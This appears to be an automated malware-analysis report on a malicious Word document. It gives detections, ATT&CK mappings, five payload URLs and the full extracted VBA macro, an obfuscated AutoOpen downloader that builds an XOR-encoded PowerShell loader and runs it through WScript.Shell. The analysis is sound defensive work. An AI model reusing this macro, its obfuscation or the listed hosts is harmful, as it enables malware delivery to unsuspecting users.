MALICIOUS
330
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Microsoft Word document containing VBA macros. Critical heuristics indicate the use of WScript.Shell and CreateObject, suggesting the execution of arbitrary commands. The AutoOpen macro is present, which is commonly used to initiate malicious activity upon document opening. This activity is likely to download and execute a second-stage payload, consistent with a downloader malware.
Heuristics 10
-
ClamAV: Doc.Downloader.Valyria-7143518-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Valyria-7143518-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
YWbad = UTUnh - FuJjjC + (70254 * Ghbqj) zLXpEXGbz = daiWHVKDiPM + CreateObject("Wscript.shell").Run(Anija + Chr(vbKeyP) + mDpaLP + Chr(vbKeyO) + WCwztAJqoYVnI + zXwFoOovO, 204416489 - 204416489) cIrukr = OwdjI - hXfuA + (80979 * ooARGD) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
YWbad = UTUnh - FuJjjC + (70254 * Ghbqj) zLXpEXGbz = daiWHVKDiPM + CreateObject("Wscript.shell").Run(Anija + Chr(vbKeyP) + mDpaLP + Chr(vbKeyO) + WCwztAJqoYVnI + zXwFoOovO, 204416489 - 204416489) cIrukr = OwdjI - hXfuA + (80979 * ooARGD) -
Payload URL decoded from an encoded PowerShell loader (5 URLs) high OLE_VBA_ENCODED_PS_DROPPER_URLA VBA macro assembles (from literals scattered across helper functions) a WScript.Shell command that runs a PowerShell stage-2 loader whose download URL is hidden in a numeric char-code array — decoded at runtime by [char]($_ -bxor k) (or +k / -k) after splitting on obfuscated delimiters. The decoded hosts (often an @-separated fallback list dropped to %TEMP% and executed) are the next-stage payload URLs, never contiguous on disk; surfaced as IOCs. Self-validating: only a transform yielding a valid host URL is reported.
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "wsnPPRzTBj" Sub AutoOpen() On Error Resume Next -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://soportek.cl/DNWbs6/ Referenced by macro
- http://zonedeux.com/hZRNr9j/Referenced by macro
- http://positivebusinessimages.com/uLRePdnDv/Referenced by macro
- http://www.arabiantravelhouse.com/2QpUykN/Referenced by macro
- https://www.voice.a1radio.ru/H3DPsvrXtK/Referenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10571 bytes |
SHA-256: da7a73b8a291b7eb823b47b2bf31cc7d806a1e70d30057ee9bc769d06a694496 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "zsBfRnJ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "wsnPPRzTBj"
Sub AutoOpen()
On Error Resume Next
GrqsJT = AJXWav * GnvMh / 51089 * anKFY / iwGdYm / hvjaH / 15342 * wMQHjD / 58274 - bwfaJ / jDjmlr * EDtwnY
fhjEF = SYIWPR * DSfEjh / 66577 * JtCzH / tKNdIh / wboMWN / 15221 * AWfWL / 77209 - XSRbHw / niGwm * OusHj
ikVWoV = JnwmY * TLnlY / 64761 * SBiwQ / uGDBf / DViiKz / 5954 * CavwA / 28368 - baNrJ / RchCWG * bBFmS
VBpccn = fEsGl * BzTfpJ / 42745 * mszjo / iaBVId / tRmwl / 7559 * wNkaQX / 10194 - IVQcwa / Isvnwr * CXzIp
uXjVW = FXqqcw * AWwGCs / 61512 * woLTM / PWVVzN / OcrSpX / 61982 * oThNA / 91590 - LiWZHw / jXCKip * VUfiU
VqbuDG = EljfnP * PVVFz / 64749 * kEwksw / IWZuOz / CbzWd / 20896 * ijGuPA / 81407 - zboLE / miJKJw * PKlYSn
KGVEZu = OXCZV * PVHwwd / 69841 * sAnWQ / sJWJsi / IUdaA / 28677 * SjdNQu / 54504 - wvzJna / FiiIF * EAthq
HAdXzP = iMXZF * MJMbJ / 66370 * dqOvsr / XNfjj / AViSXC / 89943 * rGiIcm / 87807 - sZkww / QmhfF * dVjnt
zDnnwLNwlvW (DramiGhoq + ZVsvFC)
ERwiY = PoSAs * wvpFHI / 97332 * kIHHil / kzQoi / NjABF / 34168 * aSTPBb / 50502 - HHXvFj / vJrvm * ipBMJ
nIwIXp = aERVCM * Bwowdh / 37160 * BNsiYV / HEqwIa / uWAzJA / 65813 * vsmiX / 77175 - zjpJq / lPtRY * zNfEEU
uGnNVz = HVdFL * WKqzX / 11366 * QsTQip / OTwCff / wFrIE / 14802 * qOuwwf / 36311 - iVHcnV / mWjfJ * oWaajt
FzqTw = aiZUfJ * YodvC / 83697 * zSUZYw / BrTWS / ukfini / 3552 * WNCDVl / 27319 - tfXpE / niRuzd * mGzMX
End Sub
Function DramiGhoq()
On Error Resume Next
QjOaF = MvqAD / FDvQv - pFMlsA + HiHHXX / 71647 + nsuBj
DjrNN = dDOiM / tuFVob - jhwzjD + zWUdYK / 85412 + KGNMWj
YaLOn = kvPKL / CjHmI - bPGil + CCNkz / 15669 + EGiIWl
aOLjMI = nKlmiX / cKMbu - pFZkv + bppbhz / 60070 + lzmCi
pQzPocf = "wers" + "hell " + " " + " -JO" + "In " + Chr(40) + "'" + "123D42_5" + "9a18s98_" + "49C5" + "8G40_114"
EcYwPa = pIZcR / FcUzMq - hZscrr + mDsWh / 51864 + STVDLj
EKzRp = EUiNH / BjjoSt - PLkNIa + HKUDG / 14015 + NtZHWc
Nznzt = OfmXnf / EETzpq - wtzbG + tonJjv / 31707 + BMwPO
StGLMj = CYJqiT / jIfnNi - jFoSdR + SKAPP / 22440 + LFZjT
PtQQj = "n48_61G" + "53D5" + "8n60r" + "43C127" + "D17s58<4" + "3D113_8" + "_58C61_2" + "8n51a" + "54X5"
ddHnsY = anbYLs / jvuzdZ - pIzWG + oGjjt / 70146 + KFvqj
bEEWim = FYojZ / mVRSPL - YbYYhR + ORolFA / 55927 + GTPlPm
QwYZwO = nLdSHE / jjoNEt - jCiZUp + zCiwB / 75038 + ZzITT
EjNhOQ = hhNkZ / SikvF - KYmQC + qomIzw / 2924 + Edtiu
imAmwEdFG = "8D49_43s" + "100r12" + "3_22" + "C25_40G98" + "r120" + "r55D43r" + "43D47X10" + "1_112" + "_112C44"
QMBjj = CZLvrE / fGGBrm - RlRkFw + Cnioh / 7665 + iRAhO
JcbXDq = Wknau / iVCfbJ - FEdApI + QImNi / 77353 + AqfXak
OpMdY = zPcDSb / VEwah - iBNwZv + HiiXH / 1464 + bqPRX
roKaFk = qfdEI / uBoUHQ - HJTHvi + ZlaAES / 63875 + kfitlz
juitZERWRu = "a48_47X4" + "8n45a43G5" + "8n52<1" + "13r60" + "X51D112r" + "27G17s8G6" + "1s44a105s" + "112n31r" + "55D43D" + "43s47"
sJvQD = NQzVTE / PXXiV - pKHuh + UKELBl / 12700 + rLKXO
fwjSpP = PQAXi / bAswO - cSqTiP + wXzPo / 30564 + pIhQS
rIlJBR = MAHwo / zVTocE - TTiPB + HPRTT / 54374 + XoThhS
shvmmT = UTVpY / oziuRa - dAljHK + ZBoFT / 54165 + pkqiz
nKsRqBR = "s101C" + "112D11" + "2s37D" + "48X4" + "9<58_59" + "_58n42D39"
VZvUTj = acmzY / ojvlqQ - wmPtjh + Ghmow / 80646 + vFrDW
hZDwDu = ahhoa / ImcJpl - LmUwJ + QZBrlj / 89909 + hCfTF
jKjMf = RrdjYC / UnuEGn - inYpw + ffbkz / 81606 + bmBGIQ
awqRv = OQNAQp / ZcDkO - bjQJF + kNtUEN / 194 + JirTp
PPCRvmiVzmv = "X113" + "G60r48G5" + "0s112" + "n55C5a1" + "3X17s45C1" + "02X53_" + "112_31s5" + "5s43" + "G43X4" + "7a101r" + "112D"
oZQMh = GdwYFc / swiwhz - VSSYM + wXiRi / 26932 + zDiYQi
KXWLq = YEAaL / pSkwGM - rkpmC + nhvoQ / 76408 + iuaOu
CTZziz = fNQjHS / WjWVlT - DpcPjn + NvrWC / 42143 + sSnHo
CFCom = KvvqP / sphjJ - llQvs + zBiYsb / 7319 + UDYtja
XqbFhO = "112D" + "47n48" + "<44X54C4" + "3r54a" + "41s58r61_" + "42D44r54<" + "49G58" + "G44s" + "44s5"
ZLPTJz = QiVBFb / pZvwui - jncID + sjDKC / 43692 + jLwza
LQvdG = zjYjP / jwjhh - OznsIp + uANSK / 13304 + zhYilM
NfIvZQ = ihDVOq / ijTHF - LSjON + jGBYA / 93380 + JATiw
jiOWmu = cLOVFH / AWGsAc - jwjpr + cpTFjz / 26779 + nDvlRd
SLukoQhUAO = "4C50r" + "62n56_" + "58G44" + "r113r6" + "0G48C50" + "X112" + "r42_1" + "9X13X58" + "<15<59<49" + "C27r41X"
nBzVr = AtkSS / hzmlTN - ZXWoJ + jhJXF / 84567 + izBom
oiHMww = SIoqnI / UtMZaa - lVSCH + BGwrH / 41195 + VbPrn
XjZPHq = HBkES / baDIp - oplMM + iSzSsd / 41405 + wDVLFK
QIBlA = ZRjkE / jOjpX - KGXDjb + ziDwd / 56038 + VdRrhC
WnVkiZHWZ = "112s31" + "s55C4" + "3C43r47" + "s101G112r" + "112X40n40" + "X40D113C" + "62X45G6" + "2n61r54D" + "62<49a43" + "X45r6" + "2G41<" + "58_51"
rQWWZt = cLfNWr / jvqZF - hTNki + ENXTQv / 26606 + sUITAD
nkEvu = EEuQsI / bvbLiq - haJGE + NTYEqu / 78459 + YGLNz
RbjzDb = WDBhR / zdNaz - GklfpZ + UfCpQw / 63667 + kFuKCd
UXhYMA = ComLS / zmloQ - qPIsr + faPwj / 95882 + zdtwrz
tzZMGEKiX = "n55r48X42" + "s44X5" + "8a113G60" + "D48n50a1" + "12_109" + "D14a47r1" + "0G38C52r1" + "7G112"
jVrIu = ZDBtNO / EYZzt - vwcCuc + NYQjsX / 94229 + pBcJDm
NPjzr = USWfLO / zAvlTd - sXhLu + OwwEhu / 44266 + rbiSQ
wsPrNn = ibHvmQ / QqiUEz - XTSwQ + fFYNTD / 5521 + zHpzH
CrKDcq = EKDkwV / YClnop - FrORIM + LmWZB / 57719 + bDhGuS
BuFPS = "C31a55_" + "43n4" + "3D47" + "X44D10" + "1r112D1" + "12a40r40" + "<40D11" + "3_41C48n" + "54a6" + "0<58G113"
skipjw = 23300 - pjDiG * dTjTnu - bpIAFn
cDfzF = wzaJwA / PETwj - RBmSA + RiPXwn / 79341 + dVYXu
Hqitf = 91734 - JMBcv * DTfHdo - KvpNf
zPYqZ = 93513 - lXlif * tVQqli - oHjci
rtTojzf = "C62n1" + "10<45" + "<62X5" + "9s54a48X" + "113_" + "45X42D11" + "2a23n10" + "8X27s" + "15a44G41" + "D45s7a" + "43_20a" + "112G1"
DramiGhoq = pQzPocf + PtQQj + imAmwEdFG + juitZERWRu + nKsRqBR + PPCRvmiVzmv + XqbFhO + SLukoQhUAO + WnVkiZHWZ + tzZMGEKiX + BuFPS + rtTojzf
suRrX = 47958 - hAonS * qqbCjZ - ctlKa
LLAUN = 83987 - RbXVj * qOncdW - nrPVa
aUwfud = 92409 - WBivXk * kIuMIS - zFXTau
vRuapa = 17050 - rifiQO * MsJzGK - MCfXi
End Function
Function ZVsvFC()
On Error Resume Next
TWAmT = 2737 - iWfFK * iGWhHN - nBMobw
zVqHa = 5746 - jdGQD * LdCIF - pTkIi
fklzPN = 24295 - rCJEfz * mvmcL - spYBX
jAsbw = 18233 - QEZAq * NkQSMk - wjNYa
tJokGm = "20D113" + "r12n47s5" + "1n54n43s1" + "19r1" + "20s31s" + "120X118s1" + "00_123X" + "40G16G59"
FFOLQ = 8526 - anXwRs * mBLwu - sAQQpO
VmvMz = 83662 - tPqQqD * SnHpc - hIWIRn
NQnvJB = 9579 - FiFSQb * MohJsw - qqAcb
kSKMLX = 73714 - raSISz * rfRRKP - NEwzG
oTsDiGTqz = "G127r98" + "n127C12" + "0a106X1" + "03G109D1" + "20r1" + "00r123" + "G53r5" + "9s9r" + "98_12" + "3X58"
fdqPXn = 35196 - OZjTF * XdSuzo - qsKQw
wawvjZ = 78569 - zQtBM * BZRjrz - iofCin
lRszm = 33721 - JSXzt * BioRz - wrCMFA
EpzVC = 35744 - zqcRrD * nlSwhq - bwhwOA
JYzICsLw = "_49X4" + "1X101_43" + "n58G50X" + "47r116<12" + "0X3X120C1" + "16_123n40" + "G16G" + "59D11" + "6D120" + "C113n58<3"
zzmAc = 61748 - Lkbfh * mzDjX - UvALu
DajEn = 94187 - lnTDzL * BnIFzu - ZNjRI
DJiMz = 75151 - kRwDmE * qMMIoJ - dJpDUW
Xpkjw = 48668 - OoiUw * QAjKP - lMYDjE
IKBzjGnhHP = "9X58s" + "120C" + "100_57r48" + "s45<58a" + "62_60n55<" + "119n1" + "23_5<49" + "r45_1" + "27_54r4" + "9X127C1" + "23X22" + "C25G40s"
ZnLcN = 47774 - ilzRO * hDiREa - kBFzqI
urazpJ = 58444 - HkRKC * YFick - GroiFJ
pCDvu = 61564 - TNfkdS * dkJShS - phmwLj
KCbznr = 9146 - ovMuSB * KChtd - lPQXa
hRNomLvkVf = "118n3" + "6C43a" + "45<3" + "8a36C123" + "D42G59D" + "18a113n" + "27C48C4" + "0s49<51_"
zVmQO = 46372 - AqYumQ * PjEmc - cvXlj
AVQwiz = 19215 - aTIQui * wKASct - CUslBi
SvGzw = 52523 - sGWLM * piJRD - GIsMEE
hNlEh = 29044 - UAjOf * cKInjw - CvzXjz
cEtVXiofjs = "48a62D5" + "9s25G5" + "4r51<58a1" + "19X123D" + "5<49" + "n45_115" + "s127C12" + "3r53n59" + "C9C118r1" + "00_12s43G"
TEfijP = 90296 - OifRkF * LYIRoH - OCzOOb
kqFaj = 4250 - tiBFqH * cTwFPf - rrZnZc
zjmJaI = 32916 - DEFMzj * iPXlR - cvZvn
cBzBkv = 76479 - uQpstW * OdOior - zSWAf
jMwiMtjIbk = "62r45D43<" + "114a1" + "5G45a48D" + "60D58a44" + "G44r127" + "D123X53" + "X59s9X1" + "00<6" + "1r45a58a"
TIdKk = 13276 - KONXhr * tpsCjX - zsazUh
lMOmP = 95190 - YaWzE * KDkFBM - QWRiw
IHPuk = 77203 - OjvvBw * UhlTZf - udXfK
jpciUA = 36886 - cSRfV * YnwlU - RaLSuN
nEDmfQ = "62C52G10" + "0s34C60D" + "62C4" + "3r60a5" + "5C36C34" + "r34'.sPL" + "iT" + Chr(40) + " '<rG" + "Ca_XnDs" + "'" + Chr(41) + "| f" + "OreACH-o"
Msfsq = 96265 - fOprAq * Itwjj - SctWaI
NdrOZZ = 19516 - FlLvz * FUNlio - FkVwm
tmIsVS = 75381 - noCZw * wdUzE - RHXWif
WQDLP = 48399 - zkWIH * hnjGq - ZXrYMN
jnmsjCLzY = "BJeCT" + " {[CH" + "ar]" + Chr(40) + "$_ " + "-bxor 0" + "x5F " + Chr(41) + " }" + Chr(41) + " |. " + Chr(40) + " $vERBOs"
ptQpo = 81530 - VIHLEK * ZnXqs - jLUsp
UlPlOq = 20520 - QHwMbT * iodzOK - NYpzl
qwRFV = 81241 - widMK * ilAniQ - bWVsK
kwJRiP = 16350 - zDcJfu * mCUFac - FtcuYL
cjmrSqEjATP = "EPRef" + "eRenC" + "e.tOsT" + "rInG" + Chr(40) + Chr(41) + "[1,3]" + Chr(43) + "'" + "X'-j" + "oiN''" + Chr(41) + ""
ZVsvFC = tJokGm + oTsDiGTqz + JYzICsLw + IKBzjGnhHP + hRNomLvkVf + cEtVXiofjs + jMwiMtjIbk + nEDmfQ + jnmsjCLzY + cjmrSqEjATP
cdsZs = 66634 - tnlBO * jMIXj - trohr
ItzUa = 48664 - JAYipp * Naado - XMsnwi
owBJV = 93376 - AdWzL * NoKClz - aWJsi
ufdYXz = 54290 - DYojmI * DAFhB - CGlqE
End Function
Attribute VB_Name = "kLpDBqHJSps"
Function zDnnwLNwlvW(WCwztAJqoYVnI)
On Error Resume Next
waGFR = obuBzJ - hwwXw + (87606 * LZNpYo)
LOcrs = ciooqK - fiwcR + (6050 * ApjSEW)
HVfJn = miEii - ZUDnu + (59761 * jKDtL)
KdtZN = hcWhF - rKnhD + (83884 * paUXH)
VtqGln = FQXSid - BhvnzA + (93072 * iRkKMQ)
TKQFED = TqdstF - RAvCnz + (47617 * UUCHM)
wDzqwz = mlHRzL - YkITdA + (76857 * OJMjh)
YWbad = UTUnh - FuJjjC + (70254 * Ghbqj)
zLXpEXGbz = daiWHVKDiPM + CreateObject("Wscript.shell").Run(Anija + Chr(vbKeyP) + mDpaLP + Chr(vbKeyO) + WCwztAJqoYVnI + zXwFoOovO, 204416489 - 204416489)
cIrukr = OwdjI - hXfuA + (80979 * ooARGD)
BXpni = QhOPj - TvPFPU + (74275 * vtPhcJ)
VHIIL = PoYXU - wGhTbi + (23127 * wXOUj)
aJnIZo = orGoVV - EswIaF + (83349 * GVYiuk)
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.